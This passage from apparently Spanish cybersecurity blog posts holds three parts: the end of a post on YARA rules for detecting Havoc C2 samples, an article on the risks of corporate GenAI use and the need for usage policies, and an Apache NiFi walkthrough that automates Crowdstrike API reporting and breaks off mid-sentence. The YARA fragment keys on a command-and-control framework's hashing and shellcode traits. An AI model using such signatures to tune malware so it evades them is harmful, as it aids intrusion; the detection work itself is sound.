//0xca58747d == ZwCreateEvent condition: //PE or Shellcode or Shellcode //Leave as "3 of them" for more robust (but compute expensive) searching (3 of them) and (uint16(0) == 0x5a4d or uint16(0) == 0x00e8 or uint16(0) == 0x4856) } ``` Vemos como solamente 1 de ellas funciona en este caso, detecta la DLL extraída: ``` $ yara win_havoc_ntdll_hashes_oct_2022.yar . win_havoc_ntdll_hashes_oct_2022 ./ClarisseMathilda.dll ``` Sobre esta, rule win_havoc_djb2_hashing_routine_oct_2022.yar, la vamos a modificar, quitamos “and (uint16(0) == 0x5a4d or uint16(0) == 0x00e8 or uint16(0) == 0x4856)”, dejando solamente “(any of them)” y la probamos: ``` $ yara win_havoc_djb2_hashing_routine_oct_2022.yar . win_havoc_djb2_hashing_routine_oct_2022 ./Tibia_of_Sabnock.tar.gz ``` Ahora ya sí lo detecta. Espero que os haya gustado y nos vemos en el próximo POST! Hasta otra!! --- # Riesgos del uso de ChatGPT y la necesidad de políticas de uso. URL: https://ciberseguridad.blog/riesgos-del-uso-de-chatgpt-y-la-necesidad-de-politicas-de-uso/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2023-06-19 Actualizado: 2026-09-29 Tema: Compliance > Analizamos los riesgos de ciberseguridad del uso de GenAI y la necesidad de políticas especificas, ante una tecnología que irrumpió rápidamente. Cada vez es más extenso el uso por parte de las empresas y sus empleados de herramientas como el más que conocido ChatGPT, Bard ( Si hablamos de Google ), PaLM, Copilot ( Microsoft ) y otros modelos de Inteligencia Artificial Generativa ( Conocida como GenAI ) o de lenguaje extenso (LLM), lo que esta haciendo que las empresas estén trabajando rapidamente para identificar y evaluar los riesgos de ciberseguridad relevantes. GenAI, en particular ChatGPT, ha ganado popularidad entre las empresas, como herramienta poderosa para agilizar la comunicación, escribir código, generar imágenes, audio y video , mejorar el servicio al cliente, redactar documentos y realizar investigaciones iniciales, entre otras muchísimas cosas. Sin embargo, como ocurre con cualquier tecnología, el uso de GenAI también conlleva riesgos, amenazas e impactos de seguridad que las organizaciones deben considerar detenidamente. > La IA generativa es "un punto de inflexión en la humanidad superior a la imprenta o la fisión nuclear" - José María Álvarez-Pallete Esto hace que los responsable de ciberseguridad, se planteen cuestiones clave ante la nueva avalancha tecnológica existente entorno a la IA, que podría arrancar con la que para mi es la principal de ellas: > ¿Quiénes son en mi organización los usuarios de la tecnología y con qué propósito la emplean? Pregunta que cataliza directamente sobre otras muchas e igual de preocupantes: > ¿Cómo puedo salvaguardar la información empresarial cuando los empleados interactúan con herramientas como ChatGPT? Como resultado y como punto u objetivo final, ya que el intentar parar la tecnología es como poner barreras al campo, debemos buscar ( Intentaremos ver en el post cómo ) el equilibrio entre nuestras obligaciones de ciberseguridad con el valor que la tecnología nos ofrece. A lo largo del post analizaremos los posibles riesgos y amenazas asociados al uso de herramientas GenAI como ChatGPT en entornos corporativos, e intentaremos buscar recomendaciones prácticas de su integración e inclusión dentro de las políticas de la organización. Como decía antes, es inevitable parar la tecnología y su uso, y por ello, las organizaciones que inicialmente implementaron políticas de cero uso en GenAI, recientemente han estado reconsiderando sus posiciones y levantando prohibiciones, ya que tomaron la decisión, principalmente sin tener en cuenta el futuro beneficio que esta traería a la compañía. ## Crecimiento record Como ejemplo de su rápida adopción, ChatGPT alcanzó los 100 millones de usuarios en tan solo dos meses, superando ampliamente a cualquier tecnología anterior en términos de velocidad de crecimiento. En comparación con las tecnologías de IA/ML tradicionales, GenAI es considerablemente más fácil de utilizar: Interacción intuitiva y generación de contenido novedosa: GenAI combina un enfoque innovador de IA con un sistema de chat interactivo que produce resultados refinados. Los usuarios finales tienen la capacidad de editar en tiempo real los resultados en una interfaz de chat, lo que facilita enormemente mejorar la precisión futura en comparación con plataformas anteriores. Accesible para todos: muchas de las tecnologías de GenAI son gratuitas o de bajo costo, y están disponibles para el público en general, siendo accesibles para cualquier persona con conexión a Internet. Facilidad de uso: las tecnologías de GenAI están diseñadas para ser intuitivas y fáciles de utilizar, sin importar el puesto o la función de los usuarios. Permiten interactuar de manera natural, como si se estuviera conversando con otra persona. Velocidad y agilidad: el sistema puede generar información, código fuente y datos de forma más rápida que nunca, superando a la búsqueda manual, las consultas y la indexación. Puede sintetizar millones de páginas de información en un solo párrafo. Integración con aplicaciones de terceros: muchas aplicaciones comunes en nuestro día a día, como las herramientas y complementos de navegador de Microsoft Office 365, están adaptándose para aprovechar la presencia cada vez más omnipresente de GenAI en nuestras vidas. ## Nuevos riesgos de la GenIA ( ChatGPT ) Comprender la gama de posibles riesgos, amenazas e impactos de GenAI en un entorno corporativo se ha convertido en una prioridad y debe ser analizado cuidadosamente. Estos riesgos se pueden dividir en extensiones de riesgos existentes, riesgos legales y normativos, y algunos riesgos completamente nuevos. Por ejemplo, las organizaciones deberían decidir , si los datos se envían a una plataforma de servicios GenAI de terceros, optar por no utilizar la información proporcionada por el usuario para entrenar modelos futuros y aceptar la política de retención de datos de 30 días (como en el caso de OpenAI) y si estas son lo suficientemente seguras para nuestras necesidades y cumple con su tolerancia al riesgo marcado por el negocio. O por el contrario, podemos decidir declarar una Excepción de Riesgo y aceptar el riesgo, o explorar una alternativa en las instalaciones propias. NOTA: Es posible que categoriceis los niveles de riesgo con una criticidad distinta a la que se expone en el artículo, todo ello, siempre es dependiente del negocio u entorno en el que lo analicemos. ### Privacidad y confidencialidad de los datos Nivel de riesgo estimado : ALTO El uso a nivel empresarial de la Inteligencia Artificial Generativa, conlleva un riesgo de acceso y procesamiento de información confidencial importante, propiedad intelectual, código fuente, secretos comerciales o incluso datos sensibles, ya sea a través de la entrada directa del usuario o mediante su procesamiento por API. Enviar datos confidenciales y privados fuera de los servidores de la organización, al igual que cuando pasó con el movimiento cloud, podría provocar una exposición legal y de cumplimiento normativo además de una probable exposición de información. Esta exposición puede derivar de obligaciones contractuales o regulaciones como la GDPR o incluso, estoy convencido llegaremos a verlo en el próximo ENS (tenemos uno recientito). Si bien los datos enviados a tecnologías GenAI en este caso ChatGPT , han sido confiados eficazmente a un proveedor de servicios SaaS de terceros, es decir, OpenAI, actualmente no se incorporan en tiempo real al LLM y, por lo tanto, no serán vistos por otros usuarios (De momento al menos). Las plataformas de GenAI pueden optar por utilizar la entrada del usuario para entrenar modelos futuros, pero eso no parece ser el caso en este momento, aunque yo creo que esto llegará a pasar, casi con total seguridad. > Si algo es gratis. El producto eres tu. Según la documentación de OpenAI, el contenido enviado a su API no se conserva por más de 30 días y, de manera predeterminada, se elige no compartirse, mientras que en el propio uso de ChatGPT se elige esta "participación" de manera predeterminada en cuentas gratuitas , mientras que por su contrario, será "no participativa" si disponemos de una cuenta de pago. Sin embargo, la información enviada siempre está sujeta a riesgos de almacenamiento y procesamiento. Sin embargo, esto puede afectar el apetito por el riesgo de diferentes organizaciones ... ¿acepto este posible futuro riesgo?¿ si / no ? ### Ciberseguridad de terceros y Software as a Services Nivel de riesgo estimado : ALTO Debido a la amplia adopción y a la proliferación de integraciones en aplicaciones de terceros, existe una amplia preocupaciones de que los datos se compartan con terceros con mucha más frecuencia que en el pasado y potencialmente siguiendo patrones menos predecibles. En este enlace, podremos ver con mas detenimiento que datos recopila ChatGPT, con que fin , y con quien los comparte. Si los sistemas y la infraestructura propios de la plataforma GenAI no son seguros, pueden producirse brechas de datos potenciales, como la reciente con OpenAI (creadores de ChatGPT), que podrían dar lugar a la exposición de información sensible, como datos de clientes, información financiera e información empresarial propietaria. GenAI y específicamente ChatGPT se están integrando rápidamente en muchas plataformas de terceros, como Microsoft Azure OpenAPI, así como aplicaciones, desde la suite de herramientas de Microsoft Office 365 hasta complementos del navegador, lo que representan un objetivo de alto valor para los actores maliciosos. Por lo tanto, se introduce una concentración del riesgo y se incrementa este en general. ### Riesgos legales y regulatorios Nivel de riesgo estimado : ALTO Cuando se utiliza GenAI en el ámbito empresarial, es importante cumplir con las regulaciones de privacidad de datos, como el GDPR, LOPD e incluso considerar entidades públicas o empresas que brinden servicios a las mismas, como el ENS. Un ejemplo de cómo estas regulaciones impactan es el caso de la agencia de protección de datos de Italia, que ha prohibido temporalmente el uso específico de ChatGPT (aunque otras tecnologías GenAI o instancias privadas de ChatGPT, como las de Microsoft Office 365, no han sido prohibidas). Esta prohibición ha generado cierta atención, e incluso Alemania está considerando abordar este asunto. En mi opinión, esta prohibición es contraproducente, y abogaría por una regulación racional en su lugar. De igual forma, es importante tener en cuenta las consideraciones regulatorias al utilizar GenAI en casos de uso que involucren comunicaciones dirigidas al consumidor, ya sea para interacciones directas o para producir materiales orientados al consumidor, como notificaciones informativas. Las leyes y regulaciones pueden imponer requisitos y generar responsabilidad que la tecnología puede pasar por alto. El uso de ChatGPT , como un servicio de chatbot podría dar lugar a una exposición legal o regulatoria. Por ejemplo, una empresa podría enfrentarse a acciones regulatorias o incluso demandas por no revelar a los clientes que están interactuando con un servicio de chatbot, si esto no se comunica previamente. ### Derechos de autor y propiedad intelectual Nivel de riesgo estimado : MEDIO Los modelos de Inteligencia Artificial Generativa se entrenan utilizando diferentes datos, y es posible que incluyan material patentado y con derechos de autor. Tenemos el ejemplo perfecto con MusicLM. Ya que google se plantea interrogantes sobre quién es el propietario y cómo se licencia esa información entre la empresa y otras partes cuyos datos se utilizaron para entrenar el modelo ( Esta cuestión, creo que será una de las que mas nos planteemos si optamos por crear nuestra GenAI Corporativa) Algunos informes indican que algunos modelos GenAI utilizaron contenido creado por terceros en su entrenamiento inicial, como código, texto, imágenes y más. Esto aumenta los riesgos de violar los derechos de propiedad intelectual e incluso de cometer plagio. Además, podría haber varias partes que generaron el mismo contenido potencialmente. Por ello, el uso de los resultados de GenAI podría dar lugar a reclamaciones por violación de derechos de autor, ya que algunos modelos se entrenaron con contenido protegido por derechos de autor sin obtener el permiso adecuado de los propietarios de los datos, como hemos visto con MusicLM. Actualmente, existe una falta de jurisprudencia definitiva en este ámbito que proporcione una guía clara para las políticas legales. Por lo tanto, las políticas deben desarrollarse teniendo en cuenta los principios actuales de propiedad intelectual. Y ya no solo una falta de jurisprudencia, si no que estamos en una fase de indefinición muy compleja , en la que veremos distintas propuestas, y posiblemente muy dispares entre si. Por ejemplo, la Oficina de derechos de autor de EE. UU. se ha pronunciado, publicando una guía que niega la protección de derechos de autor para las obras producidas por GenAI. Esto podría interpretarse como que cualquier persona puede copiar y utilizar libremente los resultados del software de GenAI, totalmente contrario, a lo que comentabamos que esta pasando en Italia o Alemania ... Creo que nos quedan varios años de esta indefinición, algo que no sabemos si podremos asumir, viendo el creciente uso de la tecnología de Inteligencia Artificial Generativa. ### Generación de código inseguro Nivel de riesgo estimado : MEDIO El código generado por GenAI corre el riesgo de ser utilizado e implementado sin una auditoría de seguridad adecuada o una revisión exhaustiva para detectar componentes vulnerables o maliciosos ( Un ejemplo : GitHub Copilot ). Esto podría resultar en la propagación de código vulnerable en otros sistemas de la organización y podría considerarse como una "ground truth" en el aprendizaje de modelos futuros. En inteligencia artificial, "ground truth" (verdad absoluta) se refiere a los datos de referencia o etiquetas correctas que se utilizan para entrenar y evaluar modelos de aprendizaje automático. Es la información confiable y precisa que se considera para una determinada tarea. El "ground truth" es fundamental en el proceso de entrenamiento y evaluación de modelos de IA, ya que se utiliza como punto de referencia para comparar las predicciones del modelo y medir su precisión. Por ejemplo, en el reconocimiento de imágenes, el "ground truth" serían las etiquetas correctas asociadas a cada imagen en el conjunto de entrenamiento. Obtener un conjunto de datos de "ground truth" preciso y representativo es crucial para desarrollar modelos de IA confiables y efectivos. Sin embargo, puede ser un desafío en algunos casos, ya que la creación de datos de referencia precisos puede requerir una labor intensiva de etiquetado manual o la utilización de expertos para proporcionar las respuestas correctas. ### Información incorrecta Nivel de riesgo estimado : MEDIO Los riesgos asociados con GenAI produciendo resultados incorrectos, dañinos, sesgados , pueden llegar a tener un impacto significativo en la reputación de una organización. Es importante además, tener en cuenta las consideraciones de seguridad que surgen, como el doxing (divulgación no autorizada de información personal) o por ejemplo posibles "discursos de odio". Esto plantea un desafío en términos de la confiabilidad de los resultados generados por estos modelos. Cuando los resultados de IA se incorporan en los productos de trabajo, la comunicación o la investigación de una organización sin verificar su precisión, se corre el riesgo de publicar declaraciones e información incorrectas. Esto puede tener consecuencias negativas para la credibilidad de la organización y socavar la confianza de los clientes, socios y el público en general. Una credibilidad que dificilmente se lebantará como en el caso de este abogado :) . Es esencial establecer mecanismos adecuados para verificar la precisión de los resultados generados por GenAI antes de utilizarlos en situaciones críticas. Esto puede incluir el uso de conjuntos de datos de prueba de alta calidad, pruebas rigurosas y una revisión exhaustiva por parte de expertos humanos para garantizar la precisión y confiabilidad de los resultados generados. ### Riesgo de vulnerabilidades Nivel de riesgo estimado : MEDIO Como cualquier otra aplicación, las aplicaciones internas y de terceros que utilizan GenAI deben mantenerse actualizadas y protegidas mediante controles adecuados para mitigar las vulnerabilidades clásicas del software, así como las nuevas formas en que pueden interactuar con las vulnerabilidades de la IA en constante evolución. Es importante tener en cuenta que cualquier sistema GenAI está expuesto a los mismos riesgos que cualquier otro sistema de software convencional. Además, las vulnerabilidades del software pueden interactuar con las vulnerabilidades de la IA, lo que puede generar un riesgo adicional. Por ejemplo, una vulnerabilidad en el front-end de una aplicación podría permitir la inyección rápida de código malicioso en el modelo de back-end. Alternativamente, en casos donde la salida del modelo se utiliza programáticamente, los atacantes pueden intentar manipular dicha salida para atacar sistemas posteriores. Por ejemplo, podrían generar texto que cause una inyección SQL cuando se agregue a una consulta SQL. Para mitigar estos riesgos, es fundamental implementar medidas de seguridad sólidas, como la aplicación de procesos de parcheados regulares, pruebas de ciberseguridad exhaustivas y el uso de buenas prácticas de codificación y revisión de código. ### Otros riesgos asociados Nivel de riesgo estimado : BAJO El riesgo operacional, no es exclusivo de GenAI, ya que cualquier nuevo servicio o software que se implemente puede implicar un riesgo operativo potencial. Sin embargo, el uso de GenAI puede introducir riesgos adicionales relacionados con la disponibilidad y la infraestructura. Es importante considerar los posibles riesgos de tiempo de inactividad del sistema, problemas de rendimiento y errores del usuario al utilizar GenAI. Estos riesgos deben ser parte del modelado de amenazas y la planificación de la arquitectura. Además, se deben establecer procedimientos sólidos de respaldo y recuperación ante desastres para minimizar el impacto en caso de fallos, especialmente cuando GenAI ha sido integrado en procesos críticos de la empresa. Es esencial implementar un Plan de Continuidad del Negocio (PCN) en todas las empresas para abordar estos riesgos y garantizar la disponibilidad y funcionalidad del sistema, incluso en situaciones adversas. Esto asegurará que la empresa esté preparada para hacer frente a cualquier interrupción en el funcionamiento de GenAI y en especial su interactuación con el usuario, y pueda mantener la continuidad de sus operaciones sin problemas. Por otra parte, y no sé si considerarlo un riesgo como tal, el uso de la IA está ganando cada vez más atención en relación con los principios éticos de la IA, que abarcan aspectos como la seguridad, la protección, la equidad, la transparencia, la explicabilidad y los requisitos generales de responsabilidad. Aunque estos principios aún no tienen carácter vinculante ( Y vemos relevantes personajes públicos abogando por ello ), algunos de ellos se están incorporando en marcos legales y reguladores existentes. Por lo tanto, es recomendable realizar una evaluación inicial para determinar si existe algún riesgo de impacto en estos principios y cómo se podrían considerar medidas de mitigación específicas, en caso de ser necesario. ## Políticas de ciberseguridad en el uso de GenAI de forma corporativa. Vamos a centrarnos en el caso concreto de ChatGPT en particular. Los riesgos de GenAI se pueden gestionar mediante la aplicación de las siguientes estrategias: - Identificar riesgos relevantes y sus impactos en su organización. - Establecer políticas organizativas sobre cómo y quién puede usar estas herramientas de manera que mitigue los riesgos anteriores a niveles aceptables. - Elegir proveedores de GenAI adecuados en función de su seguridad y personalización de políticas ofrecida a los clientes, por ejemplo, la exclusión voluntaria y la retención de datos ( Microsoft ya trabaja en M365 Copilot y Google con Bart ) > ¿Necesitamos una política específica para GenAI o ChatGPT? - ¡Sí! Es necesaria una política específicas para GenAI, siempre y cuando las políticas existentes no sean suficientes para cubrir estos nuevos aspectos. El alcance de una política para IA puede cubrir varios tipos de tecnologías, y necesitamos comprender cuáles se están abordando al redactar nuestras políticas para obtener un modelo de mitigación de riesgos más preciso (Parece obvio, pero es imprescindible conocer bien la tecnología para poder hacer una polícia exitosa ): 1. ChatGPT como un servicio específico, debido a su popularidad actual. 2. GenAI en general, incluidos sistemas como Bard, PaLM y Copilot. 3. Productos y servicios de terceros que utilizan tecnologías de GenAI. 4. Aplicaciones corporativas que utilizan tecnologías de GenAI en las instalaciones o en la nube en desarrollo interno. 5. Productos y servicios de terceros que utilizan tecnologías de IA 6. Desarrollo interno de modelos y aplicaciones de IA. Las empresas de todas las industrias están avanzando con políticas dedicadas, y parece que ese enfoque se está convirtiendo en la mejor práctica de la industria. ### Revisar políticas existentes VS Desarrollar nuevas políticas La mayoría de los riesgos relacionados con la IA deben estar cubiertos por las políticas corporativas existentes. Si bien cada empresa tiene requisitos únicos, estos deben incorporarse de manera apropiada en su marco normativo y político interno existente. Por ejemplo, las políticas para escribir correos electrónicos comerciales, compartir datos con terceros o utilizar proyectos de código de terceros ya deberían estar bien establecidas y deberíamos disponer de ellas, por lo que estos documentos deben revisarse y actualizarse para cubrir esta nueva demanda. La llegada de GenAI y ChatGPT también genera la necesidad de implementar nuevas políticas y controles, especialmente en aquellos casos donde la tecnología GenAI ha tenido un impacto significativo en el comportamiento de los usuarios y los sistemas. Para ilustrar esto de manera más clara, algunos usuarios solían utilizar servicios en cloud para corregir la ortografía, lo cual podría haber expuesto datos confidenciales a terceros. Sin embargo, esto no implica que hayan modificado por completo su flujo de trabajo para la producción de contenido, ni que hayan proporcionado datos sin procesar para su uso en la generación automatizada de texto, como una presentación creada con GenAI a partir de documentos cargados. La creciente incorporación de ChatGPT y otros sistemas GenAI en aplicaciones de terceros, como las herramientas de Microsoft Office 365 y los complementos de los navegadores, está ocurriendo de manera generalizada y contribuye a la rápida expansión de los riesgos asociados, lo que tal vez, si nos haga crear una política específica, dejando sin lugar a duda el uso especifico de esta tecnología al usuario final. ## Conclusiones Se pueden tomar decisiones informadas sobre riesgos al proporcionar claridad y dirección con respecto a las consideraciones mencionadas anteriormente. Dependiendo de nuestra tolerancia al riesgo, nuestra entidad puede permitir que los empleados compartan ciertos datos con una plataforma GenAI de terceros. Por ejemplo, si la empresa considera permitir el uso de herramientas desarrolladas y alojadas por OpenAI, debería considerar la implementación de ciertas medidas de ciberseguridad y principios administrativos: - Seleccionar la opción de exclusión voluntaria de la información de solicitud de usuario que se utiliza para entrenar modelos futuros, ya que actualmente es una opción disponible en la política de OpenAI. - Aceptar la política actual de retención de datos de 30 días de OpenAI. - Exigir a los usuarios que cumplan con la Política de uso aceptable y que reciban capacitación de concientización sobre riesgos en GenIA en general o incluso ChatGPT en particular. - Implementar otras salvaguardias, como controles técnicos adicionales. No está claro en qué medida estos y otros controles son posibles en esta etapa, pero algo podriamos llegar a hacer. Otro enfoque para abordar los riesgos podría ser declarar una excepción de riesgo permanente y permitir que los empleados utilicen un Servicio GenAI tal como está, o una Aceptación de riesgo temporal con la intención de reevaluar la decisión en el futuro. Otra forma de gestionar los riesgos asociados a GenAI es alojar la tecnología en las instalaciones ( Me parece una gran opción, aunque lo dificil viene como siempre de trasladarlo al ROI ), donde el equipo de ciberseguridad de la empresa tiene un control total sobre las configuraciones de protección y privacidad. Estamos actualmente muy poco maduros , ante una tecnología que crece de una forma abismal como os trasladaba anteriormente y en la que necesitamos a empezar a "agarrar por los cuernos" y no a obviarla como venimos haciendo. --- # Vitaminando Crowdstrike con Apache NiFi a coste 0 URL: https://ciberseguridad.blog/vitaminando-crowdstrike-con-apache-nifi-a-coste-0/ Tipo: Artículo Autor: Rubén García Ramiro Publicado: 2023-04-24 Actualizado: 2026-10-08 Tema: Laboratorios de ciberseguridad > Automatizamos la obtención de información sobre el API de Crowdstrike, la generación de informes y el tratamiento de la misma. ! DISFRUTAD ¡ Tras una pequeña desconexión "paternal" , volvemos al lio, con algo en lo que he estado trabajando estos últimos meses. Una herramienta que me tiene totalmente enamorado, y con la que los procesos de cyberseguridad, su automatización y el tratamiento de los datos, tienen un antes y un después con ella. De forma resumida, es una herramienta , con la que podríamos hacer todas las funciones de un XSOAR , más todas las funciones de un ETL , todo ello, OpenSource, a coste 0 ( En este punto se me saltan hasta las lagrimas ) a nivel licenciamiento ojo no HW. Aunque también, y como toda herramienta tienen carencias, aunque nos centraremos en su potencial. > Podríamos hacer todas las funciones de un XSOAR , más todas las funciones de un ETL , todo ello, OpenSource, a coste 0 A lo largo del post, me centraré en una pequeña parte de un automatismo en el que he estado trabajando, pero con el que podréis ver el potencial de la herramienta, sumado a Crowdstrike y su API, que puede ser actualmente una de las mejores de los fabricantes, ya no solo de EDR, si no a nivel global. ## ¿ Que es exactamente Apache NIFI ? Apache NiFi es una plataforma OpenSource de logística de datos capaz de mover datos entre sistemas, teniendo la capacidad de tratar los mismos por el camino, por ejemplo. La verdadera belleza de NiFi radica en su simplicidad y facilidad para desarrollar flujos de datos que involucran de millones a miles de millones de eventos entre sistemas con una semántica de entrega garantizada ( Luego aterrizaremos la facilidad, que en algunos casos no es tan sencilla ). Apache NiFi, como dice , dimensionándose en cluster, nos da la capacidad de tratar millones de eventos sin problemas, proporcionando un control en tiempo real sobre los datos (o eventos) que facilita la gestión del movimiento de datos entre cualquier fuente y cualquier destino, aunque no será el caso de nuestro ejemplo ( Pero tener presente el tratamiento de eventos, hasta podríamos montarnos un SIEM ). [Imagen: Dimensionamiento Apache NIFI] NiFi es independiente de la fuente de datos, por lo que admite fuentes y formatos dispares. Acepta flujos de datos TCP/UDP, puede leer datos de RDBMS, puede extraer datos de REST API ( nuestro ejemplo ), puede leer datos de archivos de registro al mismo tiempo que nos permitirá analizarlos, enriquecer y transformarlos en tiempo real. NiFi es un controlador de información híbrido y un procesador de eventos en tiempo real. Esta característica de NiFi lo hace super adecuado para la ciberseguridad, donde el ritmo de los datos, es constante y el tratamiento debe ser instantáneo, una joyita para nuestro SOC vamos. [Imagen: Dimensionamiento Apache NIFI tratamiento de eventos] Os dejo una pequeña tabla en el que muestra el Througput del sistema en eventos y las sorprendentes cifras si dimensionamos correctamente el sistema. Si montamos un cluster en Kubernetes las posibilidades se incrementan notablemente, aunque la adhesión de nuevos nodos al cluster es muy sencilla con Zookeeper. ( Si tenéis alguna duda técnica , escribirme sin problemas ). ## Componentes de NiFi y su funcionamiento NiFi tiene 3 componentes principales, archivo de flujo, procesadores y conectores: No os alarméis, os dejo el canal de Steven Koon, mi principal gurú a la hora de aprender NiFi de forma autodidacta. ( Hasta un zote como yo, puede montar algo medio curioso, viendo solo los videos de Steve ). - Flowfiles: Los Flowfiles en NiFi son los contenedores de datos. Los archivos de flujo son las unidades de datos básicas en NiFi. Cada Flowfile debe contener al menos un evento. Los Flowfiles tiene dos partes importantes: los atributos y la carga útil o datos. Los archivos de flujo generalmente comienzan con un conjunto predeterminado de atributos que luego se agregan mediante operaciones adicionales. Se puede hacer referencia a los atributos a través del lenguaje de expresión NiFi. La carga útil suele ser la información en sí misma y también puede ser referenciada por procesadores específicos. - Procesadores: Estos hacen el trabajo real en NiFi. Los procesadores son segmentos de código autónomos que encapsulan la lógica real del usuario. Un procesador en NiFi acepta archivos de flujo de entrada y proporciona un conjunto de archivos de flujo como salida después de aplicar la lógica encapsulada en cada evento. NiFi tiene actualmente más de 350 procesadores que sirven para diferentes propósitos. El procesador de archivos de flujo "InvokeHTTP", sobre el que luego trabajaremos más, es un procesador de archivos de flujo de ejemplo que ayuda a publicar eventos usando HTTP POST o para obtener eventos de la API usando una llamada GET. ( Ya tenemos el germen de nuestro XSOAR ) , por ejemplo, este es parte del ejemplo que veremos , en el que trabajamos con la API de Crowdstrike. [Imagen: InnvokeHTTP NiFi Crowdstrike API] - Conectores: Estos detallan cómo deben "viajar" los archivos de flujo entre los procesadores. Las conexiones comunes son éxito/fracaso, un simple pero efectivo manejo de errores para los procesadores. Los archivos de flujo que se procesan sin fallos se envían a la cola de éxito, mientras que los que tienen problemas se envían a la cola de fallo, pudiendo volverse a tratar. Todo en NiFi sucede en un flujo de datos. Un usuario puede diseñar el flujo de datos definiendo cómo el flujo de datos recibe, procesa y envía datos utilizando un conjunto de procesadores preconstruidos o escribiendo un procesador personalizado. Y esto es lo que veremos en el post, un flujo de datos de tratamiento y obtención de datos en NiFi sobre el API de Crowdstrike. Con esto, y sin entrar en mucha profundidad en el funcionamiento, vamos a ver como poder potenciar la API de Crowdstrike, que como comento anteriormente, puede ser una de las mejores del mercado. ## Generando Informes de Crowdstrike para nuestro SOC con NiFi En el caso que os traigo, y sobre el que he estado trabajando estos últimos meses, cubre una función clara y principal, Automatizar la obtención de información, la generación de informes y el tratamiento de la misma. Podríamos, desde crear un SIEM, meter las reglas que Crowdstrike nos detecte con los IoC directamente en los Firewalls, conectarla con Reyes o Lucia del CCN , mandarnos un mail cuando detecte un posible agente duplicado, agentes sin conexión .... Como comento, las opciones son infinitas, pero en este caso, supongamos que necesitamos generar los informes de manera automatizada , pero a demanda de nuestros clientes del SOC con Crowdstrike ( La metodología es la misma para otras tecnologías por ejemplo ), para lo que diseñaremos un listener webshocket en NiFi, sobre el que pasemos la información del cliente concreto, y el mismo nos devuelva una salida en JSON con la información tratada .... maravilloso verdad ;) Veamos un ejemplo de la petición a nuestro listener a NiFi ( la ip 65.20.96.214 es un hosting ) y la obtención de información de nuestro Tenant. [Imagen: Terminal con una petición curl a la API de Crowdstrike devolviendo estadísticas JSON] 1. Pido la petición a mi listener de NiFi ( 65.20.96.214 ), sobre el que publico el puerto 8448, y le pido una información concreta ( /crowdstrike/all ) . Desglosaremos esto mas adelante 2. A modo Auth y de forma que no pueda solicitar cualquiera información, meto una cabecera de control ( no quería montar un ldap para hacer la prueba ) , por lo que tengo un control de dicho parámetro que básicamente , si esta bien pasa, si no nos devolverá un error 403 Forbidden. 3. Como el sistema se basa en el tratamiento de información multicliente, paso los datos del mismo en el header ( 3 - 4 - 5 ). Toda la info que pasamos, NiFi lo tratara como atributos, sobre los que podremos trabajar más adelante. 4. Como resultado, por ejemplo, podemos obtener de una forma sencilla , datos de nuestro parque de agentes instalados de Crowdstrike, nuestro parque de equipos, aplicaciones de políticas, estadísticas por sitios ... etc. Un ejemplo, que nos da de una forma sencilla las posibilidades que tendríamos, por ejemplo, a la hora de controlar los despliegues en la fase de provisión y la aplicación de políticas. Tratamiento de IoCs , generación de alertas, reports ..... Os muestro la punta del iceberg de opciones que tendríamos, ya que NiFi, tienen componentes nativos de tratamiento de kafka, bigdata, syslogs , conectores S3 AWS, dropbox ..... A mi me tiene enamorado. Y para llegar a esto, es tan sencillo, como la creación lógica de "cajitas" de tratamiento de datos, os muestro mi ejemplo, y os lo compartiré más adelante: [Imagen: Flujo de datos NiFi con datos de Crowdstrike] Os dejo el template sobre el que os contare con un pequeño ejemplo, como podemos vitaminar nuestro Crowdstrike con NiFi, obteniendo en lugar de con un SDK , datos del API que posteriormente podremos tratar, pintar o similar. Os dejo la plantilla de la creación de un listener para Crowdstrike en NiFi: NiFi genera un xml exportable sobre la misma. Como comenté, no entraré en profundidad en NiFi, si no en el propio ejemplo, para conocer la herramienta, os animo como os indicaba antes, a ver los videos de Steve. ## Trabajando con Crowdstrike desde NiFi Ahora, desgranemos poco a poco el ejemplo de la plantilla que os he subido: [Imagen: Listener Apache NiFi para obtener datos de Crowdstrike] El punto de partida en nuestro caso, es la creación de un listener ( en el puerto 8448 en mi caso ), sobre el que nos contestará con la información que le pidamos. Como os comento en la plantilla, y tras varios casos, he montado NiFi, en standalone , cluster, en Docker, Kubernetes .... lo que hace variar la configuración de la IP del listener ( Por ejemplo, Docker nos genera unas subinterfaces 172.X.X.X o similares ) , Kubernetes nos valdría ponerlo en la localhost 0.0.0.0 , posiblemente debáis modificar en base a lo que tengáis instalado. [Imagen: Comprobación X-NIFI-KEY Crowdstrike] Si continuamos bajando , en ( 1 ) podría decirse que es una composición de control , en la que controlo que no se realicen más de 100 peticiones, el típico automatismo de alguien puesto sin control. En ( 4 ) , como os indique antes, si no proporcionamos un header X-NIFI-KEY correcto, nos redirige y si no continuamos a ( 3 ) , donde básicamente es un enrutador, basado en la URI que proporcionemos , en el ejemplo que he subido, tengo 3 distintos: /crowdstrike/all nos dará las graficas anteriores, o para que podamos comprobar el potencial, metí /sin_conexion_30 o /sin_conexion_7 que nos dará los agentes sin conexión en 7 o 30 días. [Imagen: Tabla de enrutamiento de NiFi con rutas de la API de Crowdstrike] Una pasemos esta pequeña "autenticación" , y siguiendo /crowdstrike/all de la salida inicial que he puesto, el siguiente paso, será obtener nuestro token Bearer sobre el que luego pidamos más información a la API de Crowdstrike: [Imagen: Obtener Token Bearer en Crowdstrike] Con nuestro Token , ya tenemos la capacidad de pedir información a la API, por lo que solicitamos que nos devuelva todos los IDs ( 7 ). Si habeis trabajado con la API de Crowdstrike , conocereis las limitaciones, por lo que debemos tratarlo con el endpoint Scroll ( 8 ), que realiza un control sobre el Offset y con el que podremos realizar el bucle ( 9 ) a fin de que nos de todos los IDs. Con esto IDs, posteriormente se los pasaremos de 100 en 100 , donde nos devolverá toda la información de cada uno de los agentes, y sobre la que podremos pintar los datos que os muestro al inicio. [Imagen: Flujo de Apache NiFi configurando un procesador InvokeHTTP para paginar IDs] Me iré centrando solo en los componentes más relevantes, ya que he añadido varios ( que podrían eliminarse o comprimirse a fin de tratar la información ) , quitar caracteres, espacios ... de una forma rudimentaria con NiFi, pero como veis , efectiva, y ojo, eficiente , ya que nos da mejores tiempos que el SDK. [Imagen: Separación en consultas de 100 Agentes API Crowdstrike] Una vez disponemos de todos los agentes agrupados en bloques de 100 ( el componente SPLIT superior al 10 ) , ya podemos solicitar toda la información de todos los agentes ( 10 ) , pasándole todos los bloques de IDs de nuestro parque, da igual lo grande que sea , como si nuestro parque tiene 200K agentes, haría 2000 peticiones y nos daría la información mascadita y tratada. [Imagen: Tratamiento JSON Crowdstrike 